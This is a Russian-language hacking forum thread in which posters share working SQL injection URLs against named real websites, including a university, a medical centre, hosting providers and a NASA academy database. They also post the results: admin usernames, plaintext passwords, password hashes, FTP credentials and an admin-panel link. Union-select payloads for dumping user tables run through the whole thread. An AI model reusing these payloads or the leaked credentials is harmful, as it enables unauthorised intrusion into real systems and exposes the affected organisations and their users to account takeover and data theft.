SQL Инъекции

http://www.safin.com/index.php?c=england&t=3'&cat=3'&subcat=16'

 

http://www.autoexotica.ru/news/?nid=130+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,1/*
Там стоит IPB
PS: Поробуй почитай фак по скулям и раскрути

 

http://medcenter.kz/?mid=-1+union+select+1,concat(name,char(13),pass),3,4,5,6,7,8,9+from+users+limit+1,1--

login: mcadmin
pass: ordamed.kz

 

Code:

http://www.espacejavascript.com/script.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4/*

 

Вот такой вот БОЛТ ))

Version: 5.0.18-nt
Dbname: iqc
Username: [email protected]

ничего про юзеров((

==============================
PR-4

фест какой то..виндовый хостинг.

Username:nakusp@localhost
Database:nakusp
Version:5.0.45-community-nt

 

Довел инъекцию Fugitif.

Code:

 http://www.espacejavascript.com/script.php?id=-1' 
http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,version(),5,6,/*
http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,table_name,5,6
+from+infomation_schema.tables/*

Выводятся все таблицы,я выбрал site_admins_annu. Колнки: login,pass.
login: G1Script
pass:931af583573227f0220bc568c65ce104

 

http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,email,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+users/*
ничего полезного кроме мыл не нашел

 

ALL4HOSTING​

http://www.all4hosting.ru/

таблы

Более менее интересной показалась idClient

Но там всего два юзера, и то западло какоето:

+

system_user:allforhosting
@@version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name():allforhosting

 

http://www.davisvisitor.com/sub_hotels.php?id=9&city=-1+union+select+1,version(),3,4,5,6,7,8/*

version 4.0.16

 

http://www.michaelpollan.com/article.php?id=-87+union+select+1,version(),database(),4,5,6,user(),8,9,0/*
version: MYSQL 4.1.22-standard
database: pollan_articles
user: pollan_article@localhost

 

Sql Inj

Palit.biz

Combined.biz

Plusline.org

Talk.biz

Cyberthing.net

Interprice.biz

Ransomes-jacobsen.biz

Talant.biz

3 ver. by vital & jokester

 

Code:

http://news.udaff.com

POST-инъект

Code:

http://news.udaff.com/index.php
cat=korresp&korrname='+union+select+1,concat_ws(0x3a,login,password),3+from+USERS+limit+0,1/*

inzzz:6af0088fc7c444ab185664fc4625b44a:bugaga

 

Немного о вине =)

Code:

http://www.dionysos-mereni.com/news.php?id=220+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+from+admintable/*

Табличку не подобрал =)

 

Премного извинюсь, ибо в бояне есть http://odmu.edu.ua
Если господа модераторы сочтут, что данный пост есть зло - честно обзусь моментально удалить.

Дело в том, что по поиску не нашел описания хека данного ресурса. Вдобавок есть куча смежных поддоменов к данному сайту. В общем раскрутил - если что - удалю...

http://odmu.edu.ua/index.php?v=-1+union+select+1,2,concat(username,0x3a3a,password),4,5,6+from+proftpd.users+limit+0,100/* Выборка по ftp юзерам

osas:::Z5ESqlRtTrt7Y
anatomka::gwl.XrN4bs1o
phosas:::KGt4CWj1zvBWc
osasod:::JO96GZfMHu0BU
adminweb:::MEDINedu
sopott:::M.NEksFkXBxfk
admfoto::WJc7OVOTQRkFs
userfoto::RsRvTv93
biophys:::gjtqJLxY0FDrM

ftp://217.146.249.35 <-тыкаем сюда
--------------------------------

пример: login: biophys pass: gjtqJLxY0FDrM
http://www.biophys.odmu.od.ua/


login: adminweb pass: MEDINedu
ftp://www.odmu.edu.ua/

http://www.odmu.edu.ua/_.php <-админка
Пароль: k.,bvfz ie,rf

С помощью шела путешествуем по серверу на котором висит все это чудо.

 

Сайт группы Лялис Трубецкий
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*

 

Code:

http://www.lyapis.com/anons.php?id=5+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*

 

Code:

http://fiske.colorado.edu/staff/index.php?id=-2+union+select+1,2,3,concat(table_schema,char(58),table_NAME),5,6,7,8+from+INFORMATION_SCHEMA.tables+limit+17,1/*

 

Академия Наса.. )))

http://www.nasa-academy.org/db/yearbookview.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a,'<b>',middlename,0x3a3a,login,0x3a3a,password,0x3a3a,password_expire,'</b>'),10,11,12,13+from+academy.alumni+limit+31,60/*

Выборка по юзерам.

http://www.nasa-academy.org/db/login.php аутентификация

Шняга: х*** пойми как захеширован пароль. ибо некоторые побдираются, но система не логинится. МБ дабл хеш?


К тому же походу file_priv разрешены, но пути х** нарыл...

 

www.mirtravel.com

Code:

http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(table_name,0x3a,column_name)+FROM+information_schema.columns/*

Code:

http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(nusr,0x3a,pusr)+FROM+usr/*

mir:4b53ed9250ece8ed
admin:e1eba9bbbb04da14e0f0b1cec9eea708:zzz123
Это логин под форум по ходу, а админка без пароля штоле http://www.mirtravel.com/admin/

 

Что значит похоже на ордер бай? order by ето оператор он не пожет быть похож или нет... он в вводить при правильном значении..... а так если подставить кавычку там скули нет... там про100 ошибка обращения.